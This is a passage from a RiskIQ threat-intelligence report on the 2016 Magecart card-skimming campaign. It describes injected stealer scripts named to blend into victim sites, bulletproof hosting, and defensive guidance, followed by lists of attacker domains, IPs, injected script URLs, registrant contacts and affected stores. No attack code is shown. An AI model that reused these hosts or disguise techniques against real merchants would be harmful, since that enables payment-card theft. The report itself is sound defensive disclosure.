threat actors.
  • 8. As shown in the URL sequence from RiskIQ’s blacklist incident, the URL of the injected stealer script used the filename ​everlast.js., which may indicate that the attackers recognized a major brand at their disposal and took additional steps to attempt to have their malicious code blend in with site contents. This customization of script names to match victim sites is not common across much of the analyzed activity.
  • 9. Like that observed in ​other reported activity​, the stealer code served in this instance is delivered in encoded or obfuscated form. RiskIQ believes this to be a commodity script packer and we note that it is used various capacities by multiple threat actors (observed in malicious website code injections, malicious traffic redirectors, etc.). A portion of the resultant decoded script library is shown below: Resolution and domain data in this occurrence: angular.club 108.61.211.216 108.61.211.216​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC ANGULAR.CLUB​ 2016-05-15 PDR Ltd. d/b/a PublicDomainRegistry.com bitcoin-dns.hosting Gregory braun.security@yandex.com shop.guess.net.au In ​July​, we observed another major fashion/lifecycle brand affected by the Magecart threat. The GUESS Australia​ online store was affected, and notably not implemented on Magento but rather ​Powerfront CMS​.
  • 10. As shown, the attacker appears to have adapted the name of the stealer script ​(/mage-asp.js) to, in part, reflect the technology on the underlying site—Powerfront CMS is implemented in ASP. Stealer code:
  • 11. Significant in this case is that sometime before staging this attack, hosting for the malicious stealer scripts shifted to a different network provider (Dataflow) known for high amounts of threat activity and ​noted​ to be a bulletproof hosting provider, servicing criminal customers on a dedicated basis. mage-js.link 80.87.205.143 80.87.205.143​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited MAGE-JS.LINK​ 2016-06-09 Gandi SAS gandi.net Farid Zeynalov abuse@dataflow.su www.rebeccaminkoff.com More recently, on ​September 19​, RiskIQ observed the Magento online store of fashion brand Rebecca Minkoff​ (apparel, handbags, more) affected by Magecart.
  • 13. 80.87.205.145​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited JS-SYST.SU​ 2016-08-25 REGRU-REG-FID reg.ru - ​rudneva-y@mail.ua RiskIQ notes a large portion of affected online merchants falling in the fashion and apparel category, believed to be in part because of the popularity of eCommerce in this space to extend storefronts to the Internet. Conclusion and Guidance As attackers focus on broadening capabilities to seize revenue opportunities, targets of cybercrime face an array of threats. eCommerce site owners must take every step necessary to secure their data and safeguard their payment card information. A bad experience at a retailer site may mean the loss of revenue as impacted users take their money elsewhere. Because Magecart affects websites deployed on commodity CMS and eCommerce software technology, the implementations of which may be outsourced by merchants to third parties, both merchants and integrators must take active roles in ensuring secure environments for deployed sites. Here is RiskIQ’s guidance: ● Merchants should partner with integrators and contractors who can be verified to provide assurances not only of minimum compliance requirements but can also demonstrate transparency around the technologies they utilize and their processes for hardening eCommerce installations and maintaining sound security postures. It is important that merchants do not leave assurance of this as an assumption! Consider specific contract language focused on these key elements together with SLAs. ● eCommerce site administrators must ensure familiarity and conformance to recommended security controls and best practices related to eCommerce, and particularly, the software packages utilized. All operating system software and web stack software must be kept up to date. It is critical to remain abreast of security advisories from the software developers and to ensure that appropriate patch application follows, not only for the core package but also third-party plugins and related components. Examples of such resources for the Magento CMS include the following: ○ https://magento.com/security ○ https://magento.com/security/best-practices ● Site and system administrators should safeguard credentials used to access admin interfaces and underlying web hosting environments and passwords should be changed regularly. Strong authentication schemes should be utilized where available to reduce the risk from stolen credentials. Multi-factor authentication or two-step verification options are commonplace and effective for this. Use of cryptographic keys and
  • 14. authentication tokens for access to remote hosting servers is recommended over traditional username and password logins. End users are also at significant risk as it is their payment data that is on the line when engaging in online sales. We recommend the following considerations for consumers: ● Carefully consider the online retailers whose sites you visit and to whom you submit payment data. Understand that at any given time, a portion of online retailers are compromised and present a risk that’s unknown to site owners. Without a high level of visibility and knowledge about attack techniques, it may be difficult to discern high-risk sites. Attempt to do business with merchants you believe are trustworthy and go to great lengths to protect customer data. ● Maintain secure configurations on all computers used to carry out online purchases. Any system used for online banking or eCommerce must be a known good or trusted endpoint. This applies to desktops, laptops, tablets, mobile phones, and even virtual machines. Public systems and kiosks should be avoided! Operating system and all application security updates should be up to date. Other security controls may be utilized to address specific risks, such as antivirus software or other endpoint solutions. ● An effective control that can prevent attacks such as Magecart is the use of web content whitelisting plugins such as ​NoScript​ (for Mozilla’s ​Firefox​). These types of add-ons function by allowing the end user to specify which websites are “trusted” and prevents the execution of scripts and other high-risk web content. Using such a tool, the malicious sites hosting the credit card stealer scripts would not be loaded by the browser, preventing the script logic from accessing payment card details.
  • 15. Data and indicators You can download the indicator files​ ​here​ ​and​ ​here. Attacker Domains The following domains are observed serving malicious formgrabber code or are in some way closely related to observed domains (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016. abuse-js.link angular.club cdn-js.link docstart.su govfree.pw jquery-cdn.top js-abuse.link js-abuse.su js-cdn.link js-link.su js-magic.link js-mod.su js-save.link js-save.su js-start.su js-stat.su js-sucuri.link js-syst.su js-top.link js-top.su jscript-cdn.com lolfree.pw mage-cdn.link mage-js.link mage-js.su magento-cdn.top mageonline.net mipss.su mod-js.su mod-sj.link sj-mod.link sj-syst.link
  • 16. stat-sj.link statdd.su statsdot.eu stecker.su stek-js.link syst-sj.link top-sj.link truefree.pw Attacker IP addresses The following IP addresses are observed hosting formgrabber domains or are in some way closely related to observed addresses (common hosting or other high-confidence reputational links). These domains were registered between March and August 2016. These IPs are provided with associated routing AS data indicating likely provider of hosting or Internet service. 45.32.153.108​ AS20473 | US | AS-CHOOPA - Choopa LLC 46.151.52.238​ AS203050 | RU | INTESTELLAR - PE Radashevsky Sergiy Oleksandrovich 80.87.205.143​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited 80.87.205.145​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited 80.87.205.236​ AS203624 | RU | DATAFLOWSU - ICExpert Company Limited 104.238.177.224​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC 108.61.188.71​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC 108.61.211.216​ AS20473 | US | AS-CHOOPA - Vultr Holdings LLC 167.114.35.70​ AS16276 | FR | OVH - OVH Hosting Inc. 185.25.51.176​ AS61272 | LT | IST - Informacines Sistemos Ir Technologijos UAB 217.12.202.82​ AS59729 | BG | ITL - ITL Company 217.12.203.110​ AS59729 | BG | ITL - ITL Company Sample URLs The following data consists of a set of sample Magecart URLs observed injected into affected websites, sorted by an observed date of occurrence. statsdot.eu/mage.js # 2016-05-06 jquery-cdn.top/mage.js # 2016-05-22 jquery-cdn.top/tmp.js # 2016-05-31 mageonline.net/js/mage.js # 2016-05-27 angular.club/js/vanguardgear.js # 2016-05-29 angular.club/js/everlast.js # 2016-05-30 mage-js.link/mage-asp.js # 2016-07-12 cdn-js.link/cdn-js/mage.js # 2016-07-25 statsdot.eu/mag.js # 2016-08-14
  • 17. sj-syst.link/sj-syst/ocart.js # 2016-08-16 js-save.link/js-save/mage.js # 2016-08-18 mage-cdn.link/cp/mage.js # 2016-08-18 mage-cdn.link/mage.js # 2016-08-21 mage-js.link/mage.js # 2016-09-04 jscript-cdn.com/mage.js # 2016-09-16 js-syst.su/mage-script.php # 2016-09-19 Affected websites The following data provides a list of affected websites observed to be serving script injections to known Magecart content hosting and data collection hosts over the observed timeframe. This information is extracted from RiskIQ crawl sequences and presented in the form of ​host pairs through PassiveTotal, our solution for investigators and responders exploring the Digital Footprints of malicious actors. aufdemkerbholz.de backstage.gs eyeglass.com farmwholesale.com fidelitystore.com giftshop.cancerresearchuk.org gkboptical.com gypsyville.com ihomecases.com kerbholz.com lenshareca.com mamapanda.com mauriziocollectionstore.com sasshoes.com saudi.miniexchange.com shop.air-care.com shop.guess.net.au shop2.gzanders.com shoppu.com.my storeinfinity.com truthbookpublishersstore.org valuedrugs.net www.5thavenuedog.com www.aalens.com www.agssalonequipment.com www.apacwines.com
  • 18. www.arenaswimwearstore.com www.ariashop.co.uk www.arvaco.com www.aurigaeurope.com www.ausnaturalcare.com.au www.babysavings.com.au www.bellfieldclothing.com www.benmoss.com www.bogglingshop.com www.brandvapors.com www.brooktaverner.co.uk www.capstore.dk www.cbcrabcakes.com www.chefcentral.com www.clarke-distributing.com www.clickandgrill.de www.cottinfab.com www.countrywidehealthcare.co.uk www.crossingbroadstore.com www.dgpartsmall.com www.donnabeleza.com.br www.douglovesshirts.com www.eddymerckx.com www.emarket.com.kw www.evergreen.ie www.everlast.com www.faber.co.uk www.faberacademy.co.uk www.fidelitystore.com www.freedomflask.com www.ghurka.com www.gingerandsmart.com www.gkboptical.com www.golights.com.au www.grahamandgreen.co.uk www.greekpaddles.net www.huntingandfishing.co.nz www.iloveshowpo.com www.karity.com www.knetgolf.com www.kosherwine.com www.laploma.in www.leasevillenocredit.com
  • 19. www.lions-pride.com www.littlelittleorganics.com www.lostgolfballs.com www.mackenzieltd.com www.mcs.com www.minervabeauty.com www.miniexchange.com www.mothercare.co.id www.musclefood.com www.musingapore.cn www.muzzle-loaders.com www.mylook.ee www.nationalcargocontrol.com www.nessaleebaby.com www.nichecycle.com www.onesolestore.com www.owgartenmoebel.de www.ozeparts.com.au www.paykobo.com www.personalizationuniverse.com www.punkstuff.com www.rebeccaminkoff.com www.reservewineclub.com.sg www.retaildeal.biz www.rosesonly.com.sg www.royaldiscount.com www.santonishoes.com www.savannahcollections.com www.shopboss.com.br www.showpo.com www.shrimpandgritskids.com www.skinsolutions.md www.slimminglabs.com www.smoothmag.com www.sophieparis.com www.stagespot.com www.storeinfinity.com www.superbikestore.in www.surthrival.com www.thebeautyplace.com www.titanssports.com.br www.todaycomponents.com www.tonnotermans.nl